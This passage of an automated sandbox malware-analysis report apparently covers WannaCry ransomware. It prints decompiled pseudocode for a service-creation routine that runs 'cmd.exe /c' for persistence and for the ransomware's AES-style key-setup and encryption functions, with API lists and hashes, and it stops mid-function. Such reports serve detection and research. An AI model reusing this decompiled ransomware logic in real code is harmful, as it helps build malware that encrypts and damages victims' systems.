                    • Instruction ID: 8d35de4500b3f4065ad8a7d009fa2f60231b6be20ed9f01f65d9d1a3966dd706
                    • Opcode Fuzzy Hash: 24419fe79de55b9e050378da4d3ae0875fe08eefc49193e89ac78033597620dd
                    • Instruction Fuzzy Hash: 98D147729082459FDB15CF68C881AEABBF4EF05300F15857FE49AB7381C738A915CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00401CE8(intOrPtr _a4) {
                    				void* _v8;
                    				int _v12;
                    				void* _v16;
                    				char _v1040;
                    				void* _t12;
                    				void* _t13;
                    				void* _t31;
                    				int _t32;
                    
                    				_v12 = 0;
                    				_t12 = OpenSCManagerA(0, 0, 0xf003f);
                    				_v8 = _t12;
                    				if(_t12 != 0) {
                    					_t13 = OpenServiceA(_t12, 0x40f8ac, 0xf01ff);
                    					_v16 = _t13;
                    					if(_t13 == 0) {
                    						sprintf( &_v1040, "cmd.exe /c \"%s\"", _a4);
                    						_t31 = CreateServiceA(_v8, 0x40f8ac, 0x40f8ac, 0xf01ff, 0x10, 2, 1,  &_v1040, 0, 0, 0, 0, 0);
                    						if(_t31 != 0) {
                    							StartServiceA(_t31, 0, 0);
                    							CloseServiceHandle(_t31);
                    							_v12 = 1;
                    						}
                    						_t32 = _v12;
                    					} else {
                    						StartServiceA(_t13, 0, 0);
                    						CloseServiceHandle(_v16);
                    						_t32 = 1;
                    					}
                    					CloseServiceHandle(_v8);
                    					return _t32;
                    				}
                    				return 0;
                    			}

                    APIs
                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00401CFE
                    • OpenServiceA.ADVAPI32(00000000,0040F8AC,000F01FF), ref: 00401D21
                    • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00401D31
                    • CloseServiceHandle.ADVAPI32(?), ref: 00401D3A
                    • CloseServiceHandle.ADVAPI32(?), ref: 00401D9E
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandleOpen$ManagerStart
                    • String ID: cmd.exe /c "%s"
                    • API String ID: 1485051382-955883872
                    • Opcode ID: 4dc5d8109ff1f89eb2c8b95274d01a87daa9a34efcc40f147da3f0b4c8cffa2a
                    • Instruction ID: 93977d8af42d47d1d9866270745c8e9c50065656b45fe828c5c40e24baaa5e60
                    • Opcode Fuzzy Hash: 4dc5d8109ff1f89eb2c8b95274d01a87daa9a34efcc40f147da3f0b4c8cffa2a
                    • Instruction Fuzzy Hash: 6411AF71900118BBDB205B659E4CE9FBF7CEF85745F10407AF601F21A0CA744949DB68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 54%
                    			E00402A76(void* __ecx, signed int _a4, void* _a6, void* _a7, signed int _a8, signed int _a12, signed char* _a16) {
                    				signed int _v8;
                    				signed int _v12;
                    				char _v24;
                    				int _t193;
                    				signed int _t198;
                    				int _t199;
                    				intOrPtr _t200;
                    				signed int* _t205;
                    				signed char* _t206;
                    				signed int _t208;
                    				signed int _t210;
                    				signed int* _t216;
                    				signed int _t217;
                    				signed int* _t220;
                    				signed int* _t229;
                    				void* _t252;
                    				void* _t280;
                    				void* _t281;
                    				signed int _t283;
                    				signed int _t289;
                    				signed int _t290;
                    				signed char* _t291;
                    				signed int _t292;
                    				void* _t303;
                    				void* _t313;
                    				intOrPtr* _t314;
                    				void* _t315;
                    				intOrPtr* _t316;
                    				signed char* _t317;
                    				signed char* _t319;
                    				signed int _t320;
                    				signed int _t322;
                    				void* _t326;
                    				void* _t327;
                    				signed int _t329;
                    				signed int _t337;
                    				intOrPtr _t338;
                    				signed int _t340;
                    				intOrPtr _t341;
                    				void* _t342;
                    				signed int _t345;
                    				signed int* _t346;
                    				signed int _t347;
                    				void* _t352;
                    				void* _t353;
                    				void* _t354;
                    
                    				_t352 = __ecx;
                    				if(_a4 == 0) {
                    					_a8 = 0x40f57c;
                    					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
                    					_push(0x40d570);
                    					_push( &_v24);
                    					L0040776E();
                    				}
                    				_t283 = _a12;
                    				_t252 = 0x18;
                    				_t342 = 0x10;
                    				if(_t283 != _t342 && _t283 != _t252 && _t283 != 0x20) {
                    					_t283 =  &_v24;
                    					_a8 = 0x40f57c;
                    					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
                    					_push(0x40d570);
                    					_push( &_v24);
                    					L0040776E();
                    				}
                    				_t193 = _a16;
                    				if(_t193 != _t342 && _t193 != _t252 && _t193 != 0x20) {
                    					_t283 =  &_v24;
                    					_a8 = 0x40f57c;
                    					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
                    					_t193 =  &_v24;
                    					_push(0x40d570);
                    					_push(_t193);
                    					L0040776E();
                    				}
                    				 *(_t352 + 0x3cc) = _t193;
                    				 *(_t352 + 0x3c8) = _t283;
                    				memcpy(_t352 + 0x3d0, _a8, _t193);
                    				memcpy(_t352 + 0x3f0, _a8,  *(_t352 + 0x3cc));
                    				_t198 =  *(_t352 + 0x3c8);
                    				_t354 = _t353 + 0x18;
                    				if(_t198 == _t342) {
                    					_t199 =  *(_t352 + 0x3cc);
                    					if(_t199 != _t342) {
                    						_t200 = ((0 | _t199 != _t252) - 0x00000001 & 0xfffffffe) + 0xe;
                    					} else {
                    						_t200 = 0xa;
                    					}
                    					goto L17;
                    				} else {
                    					if(_t198 == _t252) {
                    						_t200 = ((0 |  *(_t352 + 0x3cc) == 0x00000020) - 0x00000001 & 0x000000fe) + 0xe;
                    						L17:
                    						 *((intOrPtr*)(_t352 + 0x410)) = _t200;
                    						L18:
                    						asm("cdq");
                    						_t289 = 4;
                    						_t326 = 0;
                    						_a12 =  *(_t352 + 0x3cc) / _t289;
                    						if( *((intOrPtr*)(_t352 + 0x410)) < 0) {
                    							L23:
                    							_t327 = 0;
                    							if( *((intOrPtr*)(_t352 + 0x410)) < 0) {
                    								L28:
                    								asm("cdq");
                    								_t290 = 4;
                    								_t291 = _a4;
                    								_t345 = ( *((intOrPtr*)(_t352 + 0x410)) + 1) * _a12;
                    								_v12 = _t345;
                    								_t329 =  *(_t352 + 0x3c8) / _t290;
                    								_t205 = _t352 + 0x414;
                    								_v8 = _t329;
                    								if(_t329 <= 0) {
                    									L31:
                    									_a8 = _a8 & 0x00000000;
                    									if(_t329 <= 0) {
                    										L35:
                    										if(_a8 >= _t345) {
                    											L51:
                    											_t206 = 1;
                    											_a16 = _t206;
                    											if( *((intOrPtr*)(_t352 + 0x410)) <= _t206) {
                    												L57:
                    												 *((char*)(_t352 + 4)) = 1;
                    												return _t206;
                    											}
                    											_a8 = _t352 + 0x208;
                    											do {
                    												_t292 = _a12;
                    												if(_t292 <= 0) {
                    													goto L56;
                    												}
                    												_t346 = _a8;
                    												do {
                    													_t208 =  *_t346;
                    													_a4 = _t208;
                    													 *_t346 =  *0x0040ABFC ^  *0x0040AFFC ^  *0x0040B3FC ^  *(0x40b7fc + (_t208 & 0x000000ff) * 4);
                    													_t346 =  &(_t346[1]);
                    													_t292 = _t292 - 1;
                    												} while (_t292 != 0);
                    												L56:
                    												_a16 =  &(_a16[1]);
                    												_a8 = _a8 + 0x20;
                    												_t206 = _a16;
                    											} while (_t206 <  *((intOrPtr*)(_t352 + 0x410)));
                    											goto L57;
                    										}
                    										_a16 = 0x40bbfc;
                    										do {
                    											_t210 =  *(_t352 + 0x410 + _t329 * 4);
                    											_a4 = _t210;
                    											 *(_t352 + 0x414) =  *(_t352 + 0x414) ^ ((( *0x004089FC ^  *_a16) << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *((_t210 & 0x000000ff) + 0x4089fc) & 0x000000ff) << 0x00000008 ^  *0x004089FC & 0x000000ff;
                    											_a16 = _a16 + 1;
                    											if(_t329 == 8) {
                    												_t216 = _t352 + 0x418;
                    												_t303 = 3;
                    												do {
                    													 *_t216 =  *_t216 ^  *(_t216 - 4);
                    													_t216 =  &(_t216[1]);
                    													_t303 = _t303 - 1;
                    												} while (_t303 != 0);
                    												_t217 =  *(_t352 + 0x420);
                    												_a4 = _t217;
                    												_t220 = _t352 + 0x428;
                    												 *(_t352 + 0x424) =  *(_t352 + 0x424) ^ (( *0x004089FC << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *((_t217 & 0x000000ff) + 0x4089fc) & 0x000000ff;
                    												_t313 = 3;
                    												do {
                    													 *_t220 =  *_t220 ^  *(_t220 - 4);
                    													_t220 =  &(_t220[1]);
                    													_t313 = _t313 - 1;
                    												} while (_t313 != 0);
                    												L46:
                    												_a4 = _a4 & 0x00000000;
                    												if(_t329 <= 0) {
                    													goto L50;
                    												}
                    												_t314 = _t352 + 0x414;
                    												while(_a8 < _t345) {
                    													asm("cdq");
                    													_t347 = _a8 / _a12;
                    													asm("cdq");
                    													_t337 = _a8 % _a12;
                    													 *((intOrPtr*)(_t352 + 8 + (_t337 + _t347 * 8) * 4)) =  *_t314;
                    													_a4 = _a4 + 1;
                    													_t345 = _v12;
                    													_t338 =  *_t314;
                    													_t314 = _t314 + 4;
                    													_a8 = _a8 + 1;
                    													 *((intOrPtr*)(_t352 + 0x1e8 + (_t337 + ( *((intOrPtr*)(_t352 + 0x410)) - _t347) * 8) * 4)) = _t338;
                    													_t329 = _v8;
                    													if(_a4 < _t329) {
                    														continue;
                    													}
                    													goto L50;
                    												}
                    												goto L51;
                    											}
                    											if(_t329 <= 1) {
                    												goto L46;
                    											}
                    											_t229 = _t352 + 0x418;
                    											_t315 = _t329 - 1;
                    											do {
                    												 *_t229 =  *_t229 ^  *(_t229 - 4);
                    												_t229 =  &(_t229[1]);
                    												_t315 = _t315 - 1;
                    											} while (_t315 != 0);
                    											goto L46;
                    											L50:
                    										} while (_a8 < _t345);
                    										goto L51;
                    									}
                    									_t316 = _t352 + 0x414;
                    									while(_a8 < _t345) {
                    										asm("cdq");
                    										_a4 = _a8 / _a12;
                    										asm("cdq");
                    										_t340 = _a8 % _a12;
                    										 *((intOrPtr*)(_t352 + 8 + (_t340 + _a4 * 8) * 4)) =  *_t316;
                    										_a8 = _a8 + 1;
                    										_t341 =  *_t316;
                    										_t316 = _t316 + 4;
                    										 *((intOrPtr*)(_t352 + 0x1e8 + (_t340 + ( *((intOrPtr*)(_t352 + 0x410)) - _a4) * 8) * 4)) = _t341;
                    										_t329 = _v8;
                    										if(_a8 < _t329) {
                    											continue;
                    										}
                    										goto L35;
                    									}
                    									goto L51;
                    								}
                    								_a8 = _t329;
                    								do {
                    									_t317 =  &(_t291[1]);
                    									 *_t205 = ( *_t291 & 0x000000ff) << 0x18;
                    									 *_t205 =  *_t205 | ( *_t317 & 0x000000ff) << 0x00000010;
                    									_t319 =  &(_t317[2]);
                    									 *_t205 =  *_t205 |  *_t319 & 0x000000ff;
                    									_t291 =  &(_t319[1]);
                    									_t205 =  &(_t205[1]);
                    									_t60 =  &_a8;
                    									 *_t60 = _a8 - 1;
                    								} while ( *_t60 != 0);
                    								goto L31;
                    							}
                    							_t280 = _t352 + 0x1e8;
                    							do {
                    								_t320 = _a12;
                    								if(_t320 > 0) {
                    									memset(_t280, 0, _t320 << 2);
                    									_t354 = _t354 + 0xc;
                    								}
                    								_t327 = _t327 + 1;
                    								_t280 = _t280 + 0x20;
                    							} while (_t327 <=  *((intOrPtr*)(_t352 + 0x410)));
                    							goto L28;
                    						}
                    						_t281 = _t352 + 8;
                    						do {
                    							_t322 = _a12;
                    							if(_t322 > 0) {
                    								memset(_t281, 0, _t322 << 2);
                    								_t354 = _t354 + 0xc;
                    							}
                    							_t326 = _t326 + 1;
                    							_t281 = _t281 + 0x20;
                    						} while (_t326 <=  *((intOrPtr*)(_t352 + 0x410)));
                    						goto L23;
                    					}
                    					 *((intOrPtr*)(_t352 + 0x410)) = 0xe;
                    					goto L18;
                    				}
                    			}

                    APIs
                    • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402A95
                    • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402AA4
                    • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402ACD
                    • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402ADC
                    • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402AFF
                    • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402B0E
                    • memcpy.MSVCRT(?,?,00000010,?,?,00000000,00000010,?,?), ref: 00402B2A
                    • memcpy.MSVCRT(?,?,?,?,?,00000010,?,?,00000000,00000010,?,?), ref: 00402B3F
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: ??0exception@@ExceptionThrow$memcpy
                    • String ID:
                    • API String ID: 1881450474-3916222277
                    • Opcode ID: 13455132f19fce7ccee5142b200569a1d3dc411a47d032a17fbb22a214c81369
                    • Instruction ID: fcfef073648f46ce18afaeffe4143d5033c2e410e09e17396796de68d512254b
                    • Opcode Fuzzy Hash: 13455132f19fce7ccee5142b200569a1d3dc411a47d032a17fbb22a214c81369
                    • Instruction Fuzzy Hash: 8DD1C3706006099FDB28CF29C5846EA77F5FF48314F14C43EE95AEB281D778AA85CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040150D
                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00401529
                    • memcmp.MSVCRT(?,WANACRY!,00000008), ref: 00401572
                    • GlobalAlloc.KERNEL32(00000000,?,?,?,00000010,?,?,?,?), ref: 0040166D
                    • _local_unwind2.MSVCRT(?,000000FF), ref: 004016D6
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$AllocCreateGlobalSize_local_unwind2memcmp
                    • String ID: WANACRY!
                    • API String ID: 283026544-1240840912
                    • Opcode ID: 3616707767261f84fde6c13708b35c3d4dbb974938da28d5f777545cb9cffa02
                    • Instruction ID: 23909f9b909e50c20e483d6bc4be6e23e355ec3bf8b0a6de4718622c8bde6caa
                    • Opcode Fuzzy Hash: 3616707767261f84fde6c13708b35c3d4dbb974938da28d5f777545cb9cffa02
                    • Instruction Fuzzy Hash: 6E512C71900209ABDB219F95CD84FEEB7BCEB08790F1444BAF515F21A0D739AA45CB28
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 55%
                    			E0040350F(void* __ecx, signed int _a4, signed char* _a8) {
                    				signed int _v8;
                    				signed int _v12;
                    				signed char _v16;
                    				signed int _v20;
                    				intOrPtr _v24;
                    				char _v28;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				intOrPtr _v40;
                    				signed int _v44;
                    				char _v56;
                    				signed int _t150;
                    				signed int _t151;
                    				signed int _t155;
                    				signed int* _t157;
                    				signed char _t158;
                    				intOrPtr _t219;
                    				signed int _t230;
                    				signed char* _t236;
                    				signed char* _t237;
                    				signed char* _t238;
                    				signed char* _t239;
                    				signed int* _t240;
                    				signed char* _t242;
                    				signed char* _t243;
                    				signed char* _t245;
                    				signed int _t260;
                    				signed int* _t273;
                    				signed int _t274;
                    				void* _t275;
                    				void* _t276;
                    
                    				_t275 = __ecx;
                    				if( *((char*)(__ecx + 4)) == 0) {
                    					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
                    					_push(0x40d570);
                    					_push( &_v56);
                    					L0040776E();
                    				}
                    				_t150 =  *(_t275 + 0x3cc);
                    				if(_t150 == 0x10) {
                    					return E00402E7E(_t275, _a4, _a8);
                    				}
                    				asm("cdq");
                    				_t230 = 4;
                    				_t151 = _t150 / _t230;
                    				_t274 = _t151;
                    				asm("sbb eax, eax");
                    				_t155 = ( ~(_t151 - _t230) & (0 | _t274 != 0x00000006) + 0x00000001) << 5;
                    				_v28 =  *((intOrPtr*)(_t155 + 0x40bc24));
                    				_v24 =  *((intOrPtr*)(_t155 + 0x40bc2c));
                    				_v32 =  *((intOrPtr*)(_t155 + 0x40bc34));
                    				_t157 = _t275 + 0x454;
                    				if(_t274 > 0) {
                    					_v16 = _t274;
                    					_v8 = _t275 + 8;
                    					_t242 = _a4;
                    					do {
                    						_t243 =  &(_t242[1]);
                    						 *_t157 = ( *_t242 & 0x000000ff) << 0x18;
                    						 *_t157 =  *_t157 | ( *_t243 & 0x000000ff) << 0x00000010;
                    						_t245 =  &(_t243[2]);
                    						_t273 = _t157;
                    						 *_t157 =  *_t157 |  *_t245 & 0x000000ff;
                    						_v8 = _v8 + 4;
                    						_t242 =  &(_t245[1]);
                    						_t157 =  &(_t157[1]);
                    						 *_t273 =  *_t273 ^  *_v8;
                    						_t27 =  &_v16;
                    						 *_t27 = _v16 - 1;
                    					} while ( *_t27 != 0);
                    				}
                    				_t158 = 1;
                    				_v16 = _t158;
                    				if( *(_t275 + 0x410) > _t158) {
                    					_v12 = _t275 + 0x28;
                    					do {
                    						if(_t274 > 0) {
                    							_t34 =  &_v28; // 0x403b51
                    							_t260 =  *_t34;
                    							_v8 = _v12;
                    							_a4 = _t260;
                    							_v36 = _v24 - _t260;
                    							_t240 = _t275 + 0x434;
                    							_v40 = _v32 - _t260;
                    							_v20 = _t274;
                    							do {
                    								asm("cdq");
                    								_v44 = 0;
                    								asm("cdq");
                    								asm("cdq");
                    								_v8 = _v8 + 4;
                    								 *_t240 =  *(0x4093fc + _v44 * 4) ^  *(0x4097fc + ( *(_t275 + 0x454 + (_v40 + _a4) % _t274 * 4) & 0x000000ff) * 4) ^  *0x00408FFC ^  *0x00408BFC ^  *_v8;
                    								_t240 =  &(_t240[1]);
                    								_a4 = _a4 + 1;
                    								_t84 =  &_v20;
                    								 *_t84 = _v20 - 1;
                    							} while ( *_t84 != 0);
                    						}
                    						memcpy(_t275 + 0x454, _t275 + 0x434, _t274 << 2);
                    						_v12 = _v12 + 0x20;
                    						_t276 = _t276 + 0xc;
                    						_v16 = _v16 + 1;
                    						_t158 = _v16;
                    					} while (_t158 <  *(_t275 + 0x410));
                    				}
                    				_v8 = _v8 & 0x00000000;
                    				if(_t274 > 0) {
                    					_t236 = _a8;
                    					_t219 = _v24;
                    					_a8 = _t275 + 0x454;
                    					_t100 =  &_v28; // 0x403b51
                    					_v44 =  *_t100 - _t219;
                    					_v40 = _v32 - _t219;
                    					do {
                    						_a8 =  &(_a8[4]);
                    						_a4 =  *((intOrPtr*)(_t275 + 8 + (_v8 +  *(_t275 + 0x410) * 8) * 4));
                    						 *_t236 =  *0x004089FC ^ _a4 >> 0x00000018;
                    						_t237 =  &(_t236[1]);
                    						asm("cdq");
                    						 *_t237 =  *0x004089FC ^ _a4 >> 0x00000010;
                    						asm("cdq");
                    						_t238 =  &(_t237[1]);
                    						 *_t238 =  *0x004089FC ^ _a4 >> 0x00000008;
                    						_t239 =  &(_t238[1]);
                    						asm("cdq");
                    						_t158 =  *(( *(_t275 + 0x454 + (_v40 + _t219) % _t274 * 4) & 0x000000ff) + 0x4089fc) ^ _a4;
                    						 *_t239 = _t158;
                    						_t236 =  &(_t239[1]);
                    						_v8 = _v8 + 1;
                    						_t219 = _t219 + 1;
                    					} while (_v8 < _t274);
                    				}
                    				return _t158;
                    			}

                    APIs
                    • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,?,?,?,?,00403B51,?,?,?), ref: 00403528
                    • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,?,?,00403B51,?,?,?), ref: 00403537
                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00403B51,?,?), ref: 004036A9
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: ??0exception@@ExceptionThrowmemcpy
                    • String ID: $Q;@
                    • API String ID: 2382887404-262343263
                    • Opcode ID: 68433a68c8f87a96c4578501cf6b50a347b0c2ca376bc2ea45e1a632b2ad4c4a
                    • Instruction ID: bc36c6e363c45e845c5013d3ee32ff29fee655b638a1b5d52e43d816bbd12583
                    • Opcode Fuzzy Hash: 68433a68c8f87a96c4578501cf6b50a347b0c2ca376bc2ea45e1a632b2ad4c4a
                    • Instruction Fuzzy Hash: A581C3759002499FCB05CF68C9809EEBBF5EF89308F2484AEE595E7352C234BA45CF58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 54%
                    			E00403797(void* __ecx, signed int _a4, signed char* _a8) {
                    				signed int _v8;
                    				signed int _v12;
                    				signed char _v16;
                    				signed int _v20;
                    				intOrPtr _v24;
                    				signed int _v28;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				intOrPtr _v40;
                    				signed int _v44;
                    				char _v56;
                    				signed int _t150;
                    				signed int _t151;
                    				signed int _t155;
                    				signed int* _t157;
                    				signed char _t158;
                    				intOrPtr _t219;
                    				signed int _t230;
                    				signed char* _t236;
                    				signed char* _t237;
                    				signed char* _t238;
                    				signed char* _t239;
                    				signed int* _t240;
                    				signed char* _t242;
                    				signed char* _t243;
                    				signed char* _t245;
                    				signed int _t260;
                    				signed int* _t273;
                    				signed int _t274;
                    				void* _t275;
                    				void* _t276;
                    
                    				_t275 = __ecx;
                    				if( *((char*)(__ecx + 4)) == 0) {
                    					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
                    					_push(0x40d570);
                    					_push( &_v56);
                    					L0040776E();
                    				}
                    				_t150 =  *(_t275 + 0x3cc);
                    				if(_t150 == 0x10) {
                    					return E004031BC(_t275, _a4, _a8);
                    				}
                    				asm("cdq");
                    				_t230 = 4;
                    				_t151 = _t150 / _t230;
                    				_t274 = _t151;
                    				asm("sbb eax, eax");
                    				_t155 = ( ~(_t151 - _t230) & (0 | _t274 != 0x00000006) + 0x00000001) << 5;
                    				_v28 =  *((intOrPtr*)(_t155 + 0x40bc28));
                    				_v24 =  *((intOrPtr*)(_t155 + 0x40bc30));
                    				_v32 =  *((intOrPtr*)(_t155 + 0x40bc38));
                    				_t157 = _t275 + 0x454;
                    				if(_t274 > 0) {
                    					_v16 = _t274;
                    					_v8 = _t275 + 0x1e8;
                    					_t242 = _a4;
                    					do {
                    						_t243 =  &(_t242[1]);
                    						 *_t157 = ( *_t242 & 0x000000ff) << 0x18;
                    						 *_t157 =  *_t157 | ( *_t243 & 0x000000ff) << 0x00000010;
                    						_t245 =  &(_t243[2]);
                    						_t273 = _t157;
                    						 *_t157 =  *_t157 |  *_t245 & 0x000000ff;
                    						_v8 = _v8 + 4;
                    						_t242 =  &(_t245[1]);
                    						_t157 =  &(_t157[1]);
                    						 *_t273 =  *_t273 ^  *_v8;
                    						_t27 =  &_v16;
                    						 *_t27 = _v16 - 1;
                    					} while ( *_t27 != 0);
                    				}
                    				_t158 = 1;
                    				_v16 = _t158;
                    				if( *(_t275 + 0x410) > _t158) {
                    					_v12 = _t275 + 0x208;
                    					do {
                    						if(_t274 > 0) {
                    							_t260 = _v28;
                    							_v8 = _v12;
                    							_a4 = _t260;
                    							_v36 = _v24 - _t260;
                    							_t240 = _t275 + 0x434;
                    							_v40 = _v32 - _t260;
                    							_v20 = _t274;
                    							do {
                    								asm("cdq");
                    								_v44 = 0;
                    								asm("cdq");
                    								asm("cdq");
                    								_v8 = _v8 + 4;
                    								 *_t240 =  *(0x40a3fc + _v44 * 4) ^  *(0x40a7fc + ( *(_t275 + 0x454 + (_v40 + _a4) % _t274 * 4) & 0x000000ff) * 4) ^  *0x00409FFC ^  *0x00409BFC ^  *_v8;
                    								_t240 =  &(_t240[1]);
                    								_a4 = _a4 + 1;
                    								_t84 =  &_v20;
                    								 *_t84 = _v20 - 1;
                    							} while ( *_t84 != 0);
                    						}
                    						memcpy(_t275 + 0x454, _t275 + 0x434, _t274 << 2);
                    						_v12 = _v12 + 0x20;
                    						_t276 = _t276 + 0xc;
                    						_v16 = _v16 + 1;
                    						_t158 = _v16;
                    					} while (_t158 <  *(_t275 + 0x410));
                    				}
                    				_v8 = _v8 & 0x00000000;
                    				if(_t274 > 0) {
                    					_t236 = _a8;
                    					_t219 = _v24;
                    					_a8 = _t275 + 0x454;
                    					_v44 = _v28 - _t219;
                    					_v40 = _v32 - _t219;
                    					do {
                    						_a8 =  &(_a8[4]);
                    						_a4 =  *((intOrPtr*)(_t275 + 0x1e8 + (_v8 +  *(_t275 + 0x410) * 8) * 4));
                    						 *_t236 =  *0x00408AFC ^ _a4 >> 0x00000018;
                    						_t237 =  &(_t236[1]);
                    						asm("cdq");
                    						 *_t237 =  *0x00408AFC ^ _a4 >> 0x00000010;
                    						asm("cdq");
                    						_t238 =  &(_t237[1]);
                    						 *_t238 =  *0x00408AFC ^ _a4 >> 0x00000008;
                    						_t239 =  &(_t238[1]);
                    						asm("cdq");
                    						_t158 =  *(( *(_t275 + 0x454 + (_v40 + _t219) % _t274 * 4) & 0x000000ff) + 0x408afc) ^ _a4;
                    						 *_t239 = _t158;
                    						_t236 =  &(_t239[1]);
                    						_v8 = _v8 + 1;
                    						_t219 = _t219 + 1;
                    					} while (_v8 < _t274);
                    				}
                    				return _t158;
                    			}

                    APIs
                    • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,?,?,?,?,00403B9C,?,?,?), ref: 004037B0
                    • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,?,?,00403B9C,?,?,?), ref: 004037BF
                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00403B9C,?,?), ref: 00403937
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: ??0exception@@ExceptionThrowmemcpy
                    • String ID:
                    • API String ID: 2382887404-3916222277
                    • Opcode ID: f4b5f5b39d3fd1fccf69c885608927ed404fa65085bd71c262b9c8f9e9248758
                    • Instruction ID: 1cfba4d829132d5223a2741c68a06c6b284a50eb41fad236877f379c856cacdf
                    • Opcode Fuzzy Hash: f4b5f5b39d3fd1fccf69c885608927ed404fa65085bd71c262b9c8f9e9248758
                    • Instruction Fuzzy Hash: B991C375A002499FCB05CF69C480AEEBBF5FF89315F2480AEE595E7342C234AA45CF58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004029CC(void* _a4) {
                    				void* _t17;
                    				intOrPtr _t18;
                    				intOrPtr _t23;
                    				intOrPtr _t25;
                    				signed int _t35;
                    				void* _t37;
                    
                    				_t37 = _a4;
                    				if(_t37 != 0) {
                    					if( *((intOrPtr*)(_t37 + 0x10)) != 0) {
                    						_t25 =  *((intOrPtr*)(_t37 + 4));
